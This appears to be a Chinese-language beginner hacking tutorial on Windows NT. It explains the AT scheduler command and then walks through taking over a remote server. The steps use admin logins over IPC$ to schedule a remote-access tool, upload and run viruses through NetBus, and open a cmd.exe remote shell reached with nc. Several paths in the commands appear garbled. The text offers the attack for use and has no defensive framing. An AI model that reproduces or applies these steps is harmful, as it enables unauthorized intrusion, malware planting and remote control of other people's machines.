基础知识 初级黑客安全技术命令详解

核心提示： C:>net start schedule Schedule 正在启动服务..... Schedulw 服务启动成功，AT [\computername] [ [id] [/DELETE] | /DELETE [/YES]] AT [\computername] time [/INT

C:>net start schedule

Schedule 正在启动服务.....

Schedulw 服务启动成功。

AT [\computername] [ [id] [/DELETE] | /DELETE [/YES]]

AT [\computername] time [/INTERACTIVE]

[ /EVERY:date[,...] | /NEXT:date[,...]] "command"

\computername 指定远程计算机。如果省略这个参数命令会被排定在本机上运行。

id 指定给排定进度命令的识别号。

/delete 删除某个已排定进度的命令。如果省略标识，计算机上所有已排定进度的命令都会被删除。

/yes 用于删除所有作业，且不想在运行删除时显示确认信息 。

time 指定命令运行的时间。

interactive 允许作业在运行时，与用户通过桌面交互。

/every:date[,...] 指定在每周或每月的某日 (或某几日) 运行命令。

如果省略日期，则默认为在每月的本日运行。

/next:date[,...] 指定在下一个指定日期 (如，下周三)，运行命令。

如果省略日期，则默认为在每月的本日运行。

"command" 准备运行的 Windows NT 命令或批处理文件。

知道了如何使用AT，再来看看如何在远程NT上运行ntsrv.exe：

1 利用管理员登陆到目的服务器，方法为： net use \x.x.x.xipc$ "adminpwd" /user:"adminuser"

2 利用ntsrv.exe启动远程: netsvc \x.x.x.x schedule /start

3 利用AT.EXE在远程服务器设置程序定时运行，当然最快运行最理想，所以，你可以用letmein.exe得到服务器的时间，然后：

at \x.x.x.x 00:00 ntsrv.exe /port:64321

其中00:00要改为用letmein.exe得回来的具体时间+一点容量，等一会后，再在本地启动netbus.exe，键入目的服务器得ip地址或hostname，连接！比如第一种方法，你想要在目的服务器运行诸如病毒之类的东东，可以利用netbus得上传功能，将各种“大补丸”上传至目的服务器，再用netbus的"Start program"，键入完整路径，就ok了！第二种方法是利用netbus的“App redirect”功能，启动远程telnet服务，如下：在netbus中击“App redirect”，键入"C:>winntsystem32cmd.exe"，Port为：4321，服务就启动了，然后在本地运行：nc x.x.x.x 4321，出现dos启动的画面就表示连接成功：